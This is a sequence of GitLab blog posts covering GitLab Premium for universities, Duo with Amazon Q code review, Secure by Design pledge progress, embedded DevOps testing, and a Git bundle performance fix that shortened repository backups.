This patch series was contributed by Scott Chacon.

Read more

This article highlighted just a few of the contributions made by GitLab and the wider Git community for this latest release. You can learn about these from the official release announcement of the Git project. Also, check out our previous Git release blog posts to see other past highlights of contributions from GitLab team members.

GitLab's comprehensive, intelligent DevSecOps platform delivers value that extends far beyond fundamental version control. Built on an open source foundation with enterprise-grade features, GitLab Premium helps prevent costly security incidents involving student data, provides cloud-based development environments for distributed teams, and offers the professional support that educational institutions need for mission-critical systems. And now Premium includes GitLab Duo AI essentials Code Suggestions and Chat at no additional cost.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1083723619?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="GitLab Premium with Duo Core"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

The unique development environment in higher education

Universities and colleges operate in a distinctly challenging technical environment. Development teams must support multidisciplinary collaboration across technical and non-technical departments while managing vast amounts of sensitive data – from student records and financial information to research findings and faculty evaluations.

Most institutions face these challenges with limited IT resources, yet must support thousands of concurrent users across numerous projects and research initiatives. Research integrity requirements add another layer of complexity, as development work often needs to maintain traceability and reproducibility standards.

Premium solutions for educational institutions

GitLab Premium with Duo has the functionality that higher education needs.

Enhanced collaboration and workflow capabilities

Cross-departmental projects are common in educational settings – from multi-department research initiatives to custom module development for systems like Ellucian Banner, an enterprise resource planning application used by higher education. These complex projects require sophisticated workflow management that goes beyond basic version control.

GitLab Premium addresses these challenges with powerful collaboration and project visualization features, including epics, roadmaps, and advanced Kanban boards for Agile development workflows. When you assign multiple approvers to certain merge requests and protected branches, you ensure higher code quality and accountability across teams. These tools allow institutions to coordinate work across departments while aligning with institution-wide objectives – essential for managing multiphase campus technology initiatives.

In Australia, Deakin University’s enablement team uses GitLab to build standardized processes and reusable templates — such as custom merge request templates, templated build pipelines, and a security and compliance framework — that can be shared with the broader university community and citizen developers, driving innovation and collaboration both inside the university and with key partners. “We were trying to bring in a community of practice and help it thrive for quite some time, but we were never successful until we had this tool,” said Aaron Whitehand, director of Digital Enablement at Deakin University.

Read more about how Deakin University uses GitLab to drive improvements in collaboration and productivity, including a 60% reduction in manual tasks.

Advanced data protection and governance

Educational institutions generate and manage vast amounts of data, ranging from student records and financial information to research findings and faculty evaluations. The security stakes are particularly high. The 2023 MOVEit breach, which spanned three months and compromised approximately 900 educational institutions, exposed the sensitive information of more than 62 million people. This demonstrates the critical need for proactive security measures integrated directly into higher education development workflows.

Vulnerability scanning stops code releases that contain security risks, enabling institutions to establish and enforce governance protocols that protect sensitive information. These capabilities help universities implement proper access controls and permission structures for research databases, creating a secure framework where authorized researchers maintain appropriate access – effectively balancing robust protection with necessary collaboration.

GitLab is built from the ground up to secure your source code. Scalable Git-based repositories, granular access controls, and built-in compliance features eliminate bottlenecks in your workflow while meeting security requirements. GitLab Premium provides audit tracking and compliance capabilities essential for educational environments. Complete audit trails capture detailed logs of all code changes, access attempts, and system modifications with timestamps and user attribution. Full change management documentation ensures traceability of who made what changes, when, and why – critical for research integrity – while access control auditing monitors repository access and permissions changes.

Cloud-based development environments and remote collaboration

Modern educational institutions require flexible development environments that support distributed teams, remote learning scenarios, and diverse technical requirements. GitLab Premium provides:

• GitLab Workspaces: Cloud-based development environments accessible from any device
• Web IDE integration: Browser-based coding with full GitLab feature integration
• Container-based development: Consistent, reproducible development environments across different projects and user groups

These capabilities are particularly valuable for supporting remote and hybrid learning models, enabling students and researchers to access standardized development environments regardless of their physical location or local hardware constraints.

Professional support for critical systems

Small IT teams in educational settings often support large, complex infrastructure with minimal resources. Reaching out to user forums for answers doesn't always mean you'll get an accurate reply and isn't efficient for large teams. GitLab Premium includes dedicated professional support, providing faster issue resolution and upgrade assistance during critical periods like class enrollment or research deadlines.

This minimizes downtime for critical services and ensures continuity of operations during peak usage periods, giving stretched IT departments the enterprise-grade reliability they need for essential academic systems.

Built on open source with enterprise capabilities

Open source software is developed collaboratively in a public manner, with source code freely available for anyone to view, modify, and distribute. This development model fosters innovation through community contributions and ensures transparency in how software functions. GitLab's open source foundation resonates strongly with educational institutions' values around collaboration, transparency, and community contribution. GitLab Premium features extend this foundation with enterprise-grade capabilities while maintaining the ability to contribute back to the open source ecosystem.

Key open source advantages include:

• Transparency: Complete visibility into platform capabilities and security measures – you can examine exactly how the software works
• Community contribution: Ability to contribute improvements back to the broader community and benefit from global developer expertise
• Vendor independence: Reduced lock-in risk with open source alternatives and the freedom to modify code as needed
• Co-creation opportunities: Collaborative development with the broader community, including other educational institutions, to build shared solutions

AI assistant for software development tasks

GitLab Premium with Duo brings powerful AI-native capabilities directly into the development workflow, including:

• Code Suggestions, which provides real-time code completion and suggestions, helping developers write code faster and more efficiently
• Chat, which allows team members to get instant answers to questions, troubleshoot issues, and access documentation directly within the GitLab environment

These AI tools significantly enhance productivity, reduce errors, and streamline collaboration, making GitLab Premium an even more valuable asset for software development teams in higher education.

Transparency at the core

Higher education institutions handle incredibly sensitive data — from student records and research findings to proprietary academic work and federal grant information.

The GitLab AI Transparency Center demonstrates our commitment to transparency, accountability, and protection of customer data and intellectual property, providing the privacy guarantees that educational institutions require.

GitLab launched the AI Transparency Center to help customers, community, and team members better understand how GitLab upholds ethics and transparency in our AI-powered features.

Our publicly available documentation highlights the comprehensive measures we take to protect your institution's data and intellectual property. GitLab's AI Ethics Principles for Product Development guide us as we continue to build and evolve our AI functionality, helping higher education organizations harness the promise of AI while maintaining complete control and oversight of their most valuable information assets.

Get started with GitLab Premium today

For educational institutions, GitLab Premium with Duo represents a strategic technical investment that combines the benefits of open source development with enterprise-grade, AI-native capabilities. By providing professional-grade tools ready for the challenges familiar to the complex technical environment of higher education, GitLab Premium with Duo helps institutions address security vulnerabilities, streamline development workflows, and maintain the reliable infrastructure that academic and research operations depend on.

Learn more about GitLab for Public Sector or speak to our sales team today.

Read more

• Unlocking AI for every GitLab Premium and Ultimate customer
• GitLab Duo Code Suggestions
• GitLab Duo Chat

What if you could have an AI assistant that understands code review feedback and automatically implements the changes for you? That's exactly what GitLab Duo with Amazon Q brings to your development workflow. This seamless integration combines GitLab's comprehensive DevSecOps platform with Amazon Q's advanced AI capabilities, creating an intelligent assistant that can read reviewer comments and converts them directly into code changes. Instead of manually addressing each piece of feedback, you can let AI handle the implementation while you focus on the bigger picture.

How GitLab Duo with Amazon Q works

When you're viewing a merge request with reviewer comments, you'll see feedback scattered throughout your code. Let's take the examples from earlier in this article: maybe you've received a request to update a form label here, a suggestion to display fields side-by-side there, or a note about making certain text bold. Each comment represents a task that normally you'd need to handle manually.

With GitLab Duo with Amazon Q, you can simply enter the /q dev quick action in a comment. This prompts Amazon Q to analyze all the feedback and start modifying your code automatically. The AI agent understands the context of each comment and implements the requested changes directly in your codebase.

Once Amazon Q processes the feedback, you can view all the updates in the "Changes" tab of your merge request. Every modification is clearly visible, so you can verify that the AI agent correctly interpreted and implemented each piece of feedback. You can then run your updated application to confirm that all the changes work as expected — that form label is updated, the fields are displayed side-by-side, the text is bold, and yes, that button is now blue.

Watch the code review feedback process in action:

<!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/31E9X9BrK5s?si=ThFywR34V3Bfj1Z-" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

Processing code review feedback is a necessary but time-intensive part of software development. GitLab Duo with Amazon Q evolves this manual process into an automated workflow, dramatically reducing the time between receiving feedback and implementing changes. By letting AI handle these routine modifications, you're free to focus on what really matters — building innovative features and solving complex problems.

With GitLab Duo with Amazon Q, you can:

• Eliminate hours of manual feedback implementation
• Accelerate your code review cycles
• Maintain consistency in how feedback is addressed
• Reduce context switching between reviewing comments and writing code
• Ship features faster with streamlined deployment times

To learn more about GitLab Duo with Amazon Q visit us at an upcoming AWS Summit in a city near you or reach out to your GitLab representative.

GitLab Duo with Amazon Q resources

• GitLab Duo with Amazon Q: Agentic AI optimized for AWS generally available
• GitLab and AWS partner page
• GitLab Duo with Amazon Q documentation
• What is agentic AI?
• Agentic AI guides and resources

Meeting the security goals

Let’s explore the additions and improvements we've made to further enhance security across the development lifecycle.

Multi-factor authentication (MFA)

Goal: Within one year of signing the pledge, demonstrate actions taken to measurably increase the use of multi-factor authentication across the manufacturer’s products.

GitLab currently offers multiple MFA options for users to secure their accounts. We also offer SSO functionality to enable GitLab.com, Self-Managed, and GitLab Dedicated customers to streamline their authentication processes and their internal MFA requirements.

To further enhance the platform’s resilience, and to create a more secure foundation for our customers, GitLab is executing a phased MFA by Default rollout.

In the coming months, we will deploy changes requiring all customers to enable MFA on their accounts.

For customers who already have MFA enabled or authenticate to GitLab via their organization’s single sign-on (SSO) method, there will be no necessary changes. For customers who do not already have MFA enabled and are not authenticating to GitLab via their organization’s SSO method, they will be required to enable MFA and enroll in one or more of the available MFA methods.

The MFA rollout will occur in stages to ensure a smooth and consistent adoption across all customers. More details on GitLab’s MFA by Default rollout will be shared in the near future.

Default passwords

Goal: Within one year of signing the pledge, demonstrate measurable progress towards reducing default passwords across the manufacturers’ products.

To reduce the use of default passwords, GitLab uses randomly generated root passwords for its multiple installation methods. GitLab’s multi-method installation instructions also include guidance on how to change the randomly generated root password for each installation.

For some install methods, such as installing GitLab in a Docker container, the password file with the initial root password is deleted in the first container restart after 24 hours to help further harden the GitLab instance.

Reducing entire classes of vulnerabilities

Goal: Within one year of signing the pledge, demonstrate actions taken towards enabling a significant measurable reduction in the prevalence of one or more vulnerability classes across the manufacturer’s products.

GitLab has published secure coding guidelines to its documentation site that contains descriptions and guidelines for addressing security vulnerabilities commonly identified in the GitLab codebase.

The guidelines are “intended to help developers identify potential security vulnerabilities early, with the goal of reducing the number of vulnerabilities released over time.”

GitLab continues to improve its SAST rule coverage to address broader sets of security vulnerabilities for itself and its customers.

Security patches

Goal: Within one year of signing the pledge, demonstrate actions taken to measurably increase the installation of security patches by customers.

GitLab handles all updates related to its GitLab.com and GitLab Dedicated service offerings. Additionally, GitLab publishes a maintenance policy, which outlines its approach to releasing updates, backporting, upgrade recommendations and supporting documentation, etc.

GitLab’s documentation has comprehensive guidance on how to upgrade self-managed instances based on their deployment model. This includes Omnibus, Helm chart, Docker and self-compiled GitLab installations.

GitLab also provides a detailed upgrade plan to ensure proper testing and troubleshooting can be performed as well as rollback plans if necessary.

Depending on the version upgrade, specific changes (example for GitLab 17) for each version are highlighted to ensure a smooth upgrade process and limit unavailability of services.

Vulnerability disclosure policy

Goal: Within one year of signing the pledge, publish a vulnerability disclosure policy (VDP).

GitLab maintains a strong bug bounty program through HackerOne, a security.txt file highlighting GitLab’s preferred and additional disclosure processes, and release posts highlighting security fixes.

Customers and the general public can subscribe to receive GitLab’s release posts directly in their email inbox.

Common vulnerability enumerations

Goal: Within one year of signing the pledge, demonstrate transparency in vulnerability reporting

GitLab includes the Common Weakness Enumeration (CWE) field in all Common vulnerability enumerations (CVE) records it publishes. Over the past year, GitLab has iterated to also include the Common Platform Enumeration (CPE) field in CVE records.

The GitLab CVE assignments project stores a copy of all CVE identifiers assigned and published by GitLab in its role as a CVE Numbering Authority.

Check out GitLab’s CVE submission template.

Evidence of intrusions

Goal: Within one year of signing the pledge, demonstrate a measurable increase in the ability for customers to gather evidence of cybersecurity intrusions affecting the manufacturer’s products.

GitLab has published an incident response guide to help customers respond to incidents involving GitLab instances. Additionally, GitLab has open sourced versions of its GUARD detection-as-code and TLDR threat detection frameworks. The repositories for those open source frameworks can be found on GitLab’s Open Source Security Center.

In a similar manner, GitLab is adding functionality to its GitLab.com service offering to detect compromised passwords for all logins using GitLab’s native username and password authentication method.

What's next

GitLab’s Security Division’s mission is to enable everyone to innovate and succeed on a safe, secure, and trusted DevSecOps platform.

GitLab's security enhancements over the past year have allowed us to demonstrate our commitment to CISA’s Secure by Design Pledge, and they have strengthened our platform and given customers a more reliable and secure foundation to build on.

Our commitment to iteration means we're already focused on the next set of innovations that will drive us forward.

To learn more about GitLab’s security enhancements, bookmark our security page on the GitLab Blog.

Read more

• Secure by Design principles meet DevSecOps innovation in GitLab 17
• Happy birthday, Secure by Design!
• Strengthen your cybersecurity strategy with Secure by Design

Traditional embedded development approaches cannot effectively handle the software challenges of modern machines. This shortcoming slows engineers down, in part, by exacerbating challenges such as:

• Hardware testing bottlenecks
• Inconsistent build environments
• Siloed development practices
• Manual functional safety compliance processes

Embedded developers need a new approach to deal with the rapid increase in code. In this article, we’ll explain four ways you can use the GitLab AI-native DevSecOps platform to shorten feedback loops, work collaboratively and iteratively, and streamline compliance.

Challenge 1: Hardware testing bottlenecks

Unlike enterprise software that can run on virtually any cloud server, embedded automotive software must be tested on specialized hardware that precisely matches production environments. Traditional hardware-in-the-loop (HIL) testing processes often follow this pattern:

1. Developers write code for an embedded system (e.g., an electronic control unit)
2. They request access to limited, expensive hardware test benches (costing $500,000-$10M each)
3. They wait days or weeks for their scheduled access window
4. They manually deploy and test their code on physical hardware at their desks
5. They document results, pass the hardware to the next developer, and go to the back of the hardware testing queue

This process is extremely inefficient. Embedded developers may finish writing their code today and wait weeks to test it on a hardware target. By then, they've moved on to other tasks. This context switching drains productivity. Not only that, developers may wait weeks to learn they had a simple math error in their code.

Solution: Automated hardware allocation and continuous integration

You can streamline hardware testing through automation using the GitLab On-Premises Device Cloud, a CI/CD component. This lets you automate the orchestration of scarce hardware resources, turning a manual, time-intensive process into a streamlined, continuous workflow.

The On-Premises Device Cloud:

1. Creates pools of shared hardware resources
2. Automatically — and exclusively — allocates hardware to a developer’s hardware testing pipeline tasks based on availability
3. Deploys and executes tests without manual intervention
4. Collects and reports results through integrated pipelines
5. Automatically deallocates hardware back into the “available” pool

After submitting code, you’ll receive results in hours instead of days, often without ever physically touching the test hardware.

What this video for an introduction to the GitLab On-Premises Device Cloud CI/CD Component to orchestrate the remote allocation of shared hardware for HIL:

<!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/ltr2CIM9Zag?si=NOij3t1YYz4zKajC" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

You can also adopt multi-pronged testing strategies that balance speed and quality. Bring the following embedded test patterns and environments into automated GitLab CI pipelines:

• Software-in-the-loop (SIL): Testing on virtual hardware simulators for quicker initial feedback
• Processor-in-the-loop (PIL): Testing on representative processor hardware for faster feedback at a lower cost
• Hardware-in-the-loop (HIL): Testing on full production-equivalent hardware and test benches for late-stage verification

By automating the orchestration of these tests within CI pipelines, you’ll be able to identify issues earlier, iterate faster, and accelerate time to market.

Challenge 2: Inconsistent build environments

Another significant challenge in embedded development is build environment inconsistency. Embedded developers often manually execute builds on their local machines with varying configurations, compiler versions, and dependencies. Then they’ll paste the binaries from their local build to a shared codebase.

This approach creates several problems:

• Inconsistent outputs: Builds for the same source code produce different results on different machines
• "Works on my machine" syndrome: Code that builds locally fails in shared environments
• Poor traceability: Limited audit trail of who built what and when
• Knowledge silos: Build expertise becomes concentrated in a few individuals

This approach can lead to errors, bottlenecks, and costly delays.

Solution: Standardized build automation

You can address these challenges by implementing standardized build automation within CI/CD pipelines in GitLab. This approach creates consistent, repeatable, container-based build environments that eliminate machine-specific variations. Through the use of special Embedded Gateway Runner provisioning scripts, containers can interface with hardware for flashing and port monitoring for automated testing.

Key elements of this solution include:

• Lifecycle managed environments: Define complex embedded simulation environments as code; automatically deploy environments for testing and destroy them afterward
• Containerization: Use Docker containers to ensure identical build environments
• Automated dependency management: Control and version all dependencies
• Central build execution: Run builds on shared infrastructure rather than local machines

Follow this tutorial to learn how to automate embedded software builds within a GitLab CI pipeline.

By standardizing and automating the build process, you can ensure that every build follows the same steps with the same dependencies, producing consistent outputs regardless of who initiated it. This not only improves quality but also democratizes the build process, enabling more team members to participate without specialized knowledge.

Challenge 3: Siloed development practices

Enterprise development teams have widely adopted collaborative practices such as DevOps, underpinned by shared source code management (SCM) and continuous integration/continuous delivery (CI/CD) systems. Embedded developers, on the other hand, have historically worked alone at their desks. There are valid technical reasons for this.

For example, consider hardware virtualization, which is a key enabler of DevOps automation. The industry has been slower to virtualize the massive range of specialized processors and boards used in embedded systems. This is due in large part to the difficulties of virtualizing production real-time systems and the associated lack of economic incentives. Compare that to cloud virtualization which has been commoditized and benefited enterprise SaaS development for over a decade.

Many providers are now embracing virtualization-first for the sake of speeding up embedded development. If teams fail to adopt virtual testing options, however, their silos will remain and negatively impact the business through:

• Knowledge fragmentation: Critical insights remain scattered across individuals and teams
• Redundant development: Multiple teams solve identical problems, creating inconsistencies
• Late-stage discovery during big-bang integrations: Problems are found late in the process when multiple developers integrate their code at once, when errors are more costly to fix
• Stifled innovation: Solutions from one domain rarely influence others, hampering the development of new product ideas

Solution: Collaborative engineering through a unified platform

An important step in breaking down these silos is to standardize embedded development around GitLab’s unified DevSecOps platform. In this regard, GitLab is aligned with the shift of embedded systems toward more consolidated, shared platforms on embedded devices. GitLab enables:

• Shared visibility: Make all code, Issues, and documentation visible across teams
• Collaborative workflows: Enable peer review and knowledge sharing through merge requests
• Centralized knowledge: Maintain a single source of truth for all development artifacts
• Asynchronous collaboration: Allow teams to work together across different locations and time zones

Human-AI agent collaboration is a fundamental ingredient to fueling the customer-facing innovations that digital natives and established embedded brands desire. GitLab enables human-AI collaboration as well. By creating transparency across the development lifecycle, GitLab changes embedded development from an isolated activity to a collaborative practice. Engineers can see each other's work in progress, learn from collective experiences, and build upon shared solutions.

Watch this presentation from Embedded World Germany 2025, which explains the power of embedded developers collaborating and sharing “work in progress”. The demo portion from 24:42 to 36:51 shows how to integrate HIL into a GitLab CI pipeline and enable collaborative development.

<!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/F_rlOyq0hzc?si=eF4alDY6HK98uZPj" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

Perhaps most importantly, by achieving greater collaboration through DevSecOps, teams can unlock embedded systems innovations that would otherwise remain hidden. Indeed, collaboration fuels innovation. One study, for example, found that group brainstorming, when properly structured, can lead to more innovative and creative outcomes than individuals working alone. Collaborative development is crucial in the race to develop software-defined products.

Challenge 4: Manual functional safety compliance processes

Embedded systems in the automotive and aerospace industries must comply with rigorous functional safety standards, including ISO 26262, MISRA C/C++, DO-178C, and DO-254. Traditional compliance approaches involve manual reviews, extensive documentation, and separate verification activities that occur late in the development cycle. This often creates security review bottlenecks. When specialized embedded security and code quality scanners detect vulnerabilities in a developer’s code, the scan issue gets added to a pile of other issues that haven’t been resolved. Developers can’t integrate their code, and security personnel need to wade through a backlog of code violations. This creates delays and makes compliance more difficult.

Some of the challenges can best be summed up as:

• Late-stage compliance issues: Problems discovered after development is complete
• Documentation burden: Extensive manual effort to create and maintain compliance evidence
• Process bottlenecks: Serial compliance activities that block development progress
• Expertise dependence: Reliance on limited specialists for compliance activities

As a result, teams often need to choose between velocity and compliance — a precarious trade-off in safety-critical systems.

Solution: Automated functional safety compliance workflow building blocks

Rather than treating security and compliance as post-development verification activities, you can codify compliance requirements and enforce them automatically through customizable frameworks in GitLab. To do this for functional safety standards, in particular, you can integrate GitLab with specialized embedded tools, which provide the depth of firmware scanning required by functional safety standards. Meanwhile, GitLab provides automated compliance checks, full audit trails, and merge request gating — all features needed to support a robust continuous compliance program.

This integrated approach includes:

• Compliance-as-code: Define compliance requirements as automated checks
• Integrated specialized tools: Connect tools like CodeSonar into the DevSecOps platform for automotive-specific compliance
• Continuous compliance verification: Verify requirements throughout development
• Automated evidence collection: Gather compliance artifacts as a by-product of development

Watch this video to learn how to use Custom Compliance Frameworks in GitLab to create your own compliance policies. You can create compliance policies related to any standard (e.g., ISO 26262) and automatically enforce those policies in GitLab.

<!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/S-FQjzSyVJw?si=0UdtGNuugLPG0SLL" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

By shifting compliance left and embedding it within normal development workflows, you can maintain safety standards without sacrificing velocity. Automated checks catch issues early when they're easier and less expensive to fix, while continuous evidence collection reduces the documentation burden.

Realizing the power of embedded DevOps

Embedded development is changing fast. Teams that remain stuck in manual processes and isolated workflows will find themselves increasingly left behind, while those that embrace automated, collaborative practices will define the future of software-defined smart systems.

Explore our Embedded DevOps Workshop to start automating embedded development workflows with GitLab, or watch this presentation from GitLab's Field Chief Cloud Architect to learn how leading organizations are bringing hardware-in-the-loop testing into continuous integration workflows to accelerate embedded development.

Learn more

• Why GitLab Premium with Duo for embedded systems development?
• Why GitLab Ultimate with Duo for embedded systems development?
• More embedded development systems presentations from GitLab

Ultimately, we traced the issue to a 15-year-old Git function with O(N²) complexity and fixed it with an algorithmic change, reducing backup times exponentially. The result: lower costs, reduced risk, and backup strategies that actually scale with your codebase.

This turned out to be a Git scalability issue that affects anyone with large repositories. Here's how we tracked it down and fixed it.

Backup at scale

First, let's look at the problem. As organizations scale their repositories and backups grow more complex, here are some of the challenges they can face:

• Time-prohibitive backups: For very large repositories, creating a repository backup could take several hours, which can hinder the ability to schedule regular backups.
• Resource intensity: Extended backup processes can consume substantial server resources, potentially impacting other operations.
• Backup windows: Finding adequate maintenance windows for such lengthy processes can be difficult for teams running 24/7 operations.
• Increased failure risk: Long-running processes are more susceptible to interruptions from network issues, server restarts, and system errors, which can force teams to restart the entire very long backup process from scratch.
• Race conditions: Because it takes a long time to create a backup, the repository might have changed a lot during the process, potentially creating an invalid backup or interrupting the backup because objects are no longer available.

These challenges can lead to compromising on backup frequency or completeness – an unacceptable trade-off when it comes to data protection. Extended backup windows can force customers into workarounds. Some might adopt external tooling, while others might reduce backup frequency, resulting in potential inconsistent data protection strategies across organizations.

Now, let's dig into how we identified a performance bottleneck, found a resolution, and deployed it to help cut backup times.

The technical challenge

GitLab's repository backup functionality relies on the git bundle create command, which captures a complete snapshot of a repository, including all objects and references like branches and tags. This bundle serves as a restoration point for recreating the repository in its exact state.

However, the implementation of the command suffered from poor scalability related to reference count, creating a performance bottleneck. As repositories accumulated more references, processing time increased exponentially. In our largest repositories containing millions of references, backup operations could extend beyond 48 hours.

Root cause analysis

To identify the root cause of this performance bottleneck, we analyzed a flame graph of the command during execution.

A flame graph displays the execution path of a command through its stack trace. Each bar corresponds to a function in the code, with the bar's width indicating how much time the command spent executing within that particular function.

When examining the flame graph of git bundle create running on a repository with 10,000 references, approximately 80% of the execution time is consumed by the object_array_remove_duplicates() function. This function was introduced to Git in the commit b2a6d1c686 (bundle: allow the same ref to be given more than once, 2009-01-17).

To understand this change, it's important to know that git bundle create allows users to specify which references to include in the bundle. For complete repository bundles, the --all flag packages all references.

The commit addressed a problem where users providing duplicate references through the command line – such as git bundle create main.bundle main main - would create a bundle without properly handling the duplicated main reference. Unbundling this bundle in a Git repository would break, because it tries to write the same ref twice. The code to avoid duplication uses nested for loops that iterate through all references to identify duplicates. This O(N²) algorithm becomes a significant performance bottleneck in repositories with large reference counts, consuming substantial processing time.

The fix: From O(N²) to efficient mapping

To resolve this performance issue, we contributed an upstream fix to Git that replaces the nested loops with a map data structure. Each reference is added to the map, which automatically ensures only a single copy of each reference is retained for processing.

This change dramatically enhances the performance of git bundle create and enables much better scalability in repositories with large reference counts. Benchmark testing on a repository with 10,000 references demonstrates a 6x performance improvement.

Benchmark 1: bundle (refcount = 100000, revision = master)
  Time (mean ± σ): 	14.653 s ±  0.203 s	[User: 13.940 s, System: 0.762 s]
  Range (min … max):   14.237 s … 14.920 s	10 runs

Benchmark 2: bundle (refcount = 100000, revision = HEAD)
  Time (mean ± σ):  	2.394 s ±  0.023 s	[User: 1.684 s, System: 0.798 s]
  Range (min … max):	2.364 s …  2.425 s	10 runs

Summary
  bundle (refcount = 100000, revision = HEAD) ran
	6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)

The patch was accepted and merged into upstream Git. At GitLab, we backported this fix to ensure our customers could benefit immediately, without waiting for the next Git release.

The result: Dramatically decreased backup times

The performance gains from this improvement have been nothing short of transformative:

• From 48 hours to 41 minutes: Creating a backup of our largest repository (gitlab-org/gitlab) now takes just 1.4% of the original time.
• Consistent performance: The improvement scales reliably across repository sizes.
• Resource efficiency: We significantly reduced server load during backup operations.
• Broader applicability: While backup creation sees the most dramatic improvement, all bundle-based operations that operate on many references benefit.

What this means for GitLab customers

For GitLab customers, this enhancement delivers immediate and tangible benefits on how organizations approach repository backup and disaster recovery planning:

• Transformed backup strategies
  • Enterprise teams can establish comprehensive nightly schedules without impacting development workflows or requiring extensive backup windows.
  • Backups can now run seamlessly in the background during nightly schedules, instead of needing to be dedicated and lengthy.
• Enhanced business continuity
  • With backup times reduced from days to minutes, organizations significantly minimize their recovery point objectives (RPO). This translates to reduced business risk – in a disaster scenario, you're potentially recovering hours of work instead of days.
• Reduced operational overhead
  • Less server resource consumption and shorter maintenance windows.
  • Shorter backup windows mean reduced compute costs, especially in cloud environments, where extended processing time translates directly to higher bills.
• Future-proofed infrastructure
  • Growing repositories no longer force difficult choices between backup frequency and system performance.
  • As your codebase expands, your backup strategy can scale seamlessly alongside it

Organizations can now implement more robust backup strategies without compromising on performance or completeness. What was once a challenging trade-off has become a straightforward operational practice.

Starting with the GitLab 18.0 release, all GitLab customers regardless of their license tier can already fully take advantage of these improvements for their backup strategy and execution. There is no further change in configuration required.

What's next

This breakthrough is part of our ongoing commitment to scalable, enterprise-grade Git infrastructure. While the improvement of 48 hours to 41 minutes for backup creation time represents a significant milestone, we continue to identify and address performance bottlenecks throughout our stack.

We're particularly proud that this enhancement was contributed upstream to the Git project, benefiting not just GitLab users but the broader Git community. This collaborative approach to development ensures that improvements are thoroughly reviewed, widely tested, and available to all.

Deep infrastructure work like this is how we approach performance at GitLab. Join the GitLab 18 virtual launch event to see what other fundamental improvements we're shipping. Register today!

Here's where GitLab Duo with Amazon Q, our new offering that delivers agentic AI throughout the software development lifecycle for AWS customers, comes in to transform your review process. This intelligent, AI-powered solution can perform comprehensive code reviews for you in a fraction of the time it would take your human colleagues. By leveraging advanced agentic AI capabilities, GitLab Duo with Amazon Q streamlines your entire review workflow without sacrificing the quality and thoroughness you need. Think of it as having an always-available, highly skilled reviewer who can instantly analyze your code and provide actionable feedback.

How it works: Launching a code review

So how does GitLab Duo with Amazon Q actually work? Let's say you've just finished working on a feature and created a merge request with multiple code updates. Instead of pinging your teammates and waiting for their availability, you simply enter a quick command in the comment section: "/q review". That's it – just those two words trigger the AI to spring into action.

Once you've entered the command, Amazon Q Service immediately begins analyzing your code changes. You'll see a confirmation that the review is underway, and within moments, the AI is examining every line of your updates, checking for potential issues across multiple dimensions. When the review completes, you receive comprehensive feedback that covers all the bases: bug detection, readability improvements, syntax errors, and adherence to your team's coding standards. The AI doesn't just point out problems, it provides context and suggestions for fixing them, making it easy for you to understand what needs attention and why.

The beauty of this agentic AI approach is that it handles the heavy lifting of code review while you focus on what matters most: building great software. You get the benefits of thorough code reviews — better bug detection, consistent coding standards, and improved code quality — without the time sink. Your deployment times shrink dramatically because you're no longer waiting in review queues, and your entire team becomes more productive.

Why use GitLab Duo with Amazon Q?

GitLab Duo with Amazon Q transforms your development workflow in the following ways:

• Lightning-fast code reviews that don't compromise on quality
• Consistent application of coding standards across your entire codebase
• Immediate feedback that helps you fix issues before they reach production
• Reduced deployment times that let you ship features faster
• More time for your team to focus on creative problem-solving instead of repetitive reviews

Ready to see this game-changing feature in action? Watch how GitLab Duo with Amazon Q can revolutionize your code review process:

<!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/4gFIgyFc02Q?si=GXVz--AIrWiwzf-I" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

To learn more about GitLab Duo with Amazon Q visit us at an upcoming AWS Summit in a city near you or reach out to your GitLab representative.

And make sure to join the GitLab 18 virtual launch event to learn about our agentic AI plans and more. Register today!

"GitLab is the most all-in-one of the all-in-one solutions and suits enterprises looking to standardize with a single purchase.” - Forrester Wave™: DevOps Platforms, Q2 2025

For us, this recognition reflects what we've been hearing from customers: They need to deliver secure software faster, but existing solutions force them to compromise on speed, security, or simplicity. GitLab delivers all three. And with our GitLab 18.0 release in May, we’ve taken this a step further by including AI-native GitLab Duo capabilities — such as test generation, code suggestions, and code refactoring — directly in GitLab Premium and GitLab Ultimate at no additional cost.

Access the report today!

Staying at the forefront of AI transformation, with enterprise control

DevSecOps is rapidly evolving, with AI at the forefront of that change. Unfortunately, many AI tools force a choice: cutting-edge capabilities or enterprise security.

Forrester scored GitLab a 5 – the highest on their scale – for both the AI infusion and AI risk mitigation criteria. We’re pleased to see our focus on building innovative AI capabilities that maintain security is being noticed by more than just our customers.

This dual strength shows up across our GitLab Duo AI offerings, including:

• Duo Workflow (private beta): Autonomous AI agents that handle complex tasks across development, security, and operations — with enterprise-grade guardrails and audit trails.
• Agentic Chat: Contextual, conversational AI assistance for everything from code explanations to test creation — with IP protection and privacy controls built in.
• Code Suggestions: AI assistance that can predictively complete code blocks, define function logic, generate tests, and propose common code like regex patterns.
• AI-native Vulnerability Resolution: Find and fix vulnerabilities with auto explanation and auto-generated merge requests, ensuring a streamlined development process.

Doing more with less

We’ve heard loud and clear that DevSecOps teams don’t need more tools and integrations that help them with part of their software delivery lifecycle. They need a seamless, integrated developer experience that covers the entire SDLC.

We believe GitLab’s scores in the following criteria are validation of our customer-focused strategy:

• Day zero experience: Forrester cited our “strong day zero experience,” noting that “everything is ready to run out-of-the-box,” supported by extensive migration tools and tutorials.
• Developer tooling: Forrester pointed to GitLab Duo with Amazon Q, our agentic AI offering for AWS customers, as well as our cloud development environment, integrated developer platform, and wikis for documentation as examples.
• Project planning and alignment: Forrester noted our "strong compliance center," and that we have tools to drive alignment top-down and bottom-up.
• Pipeline security: Forrester gave us the highest score possible in the pipeline security criterion.
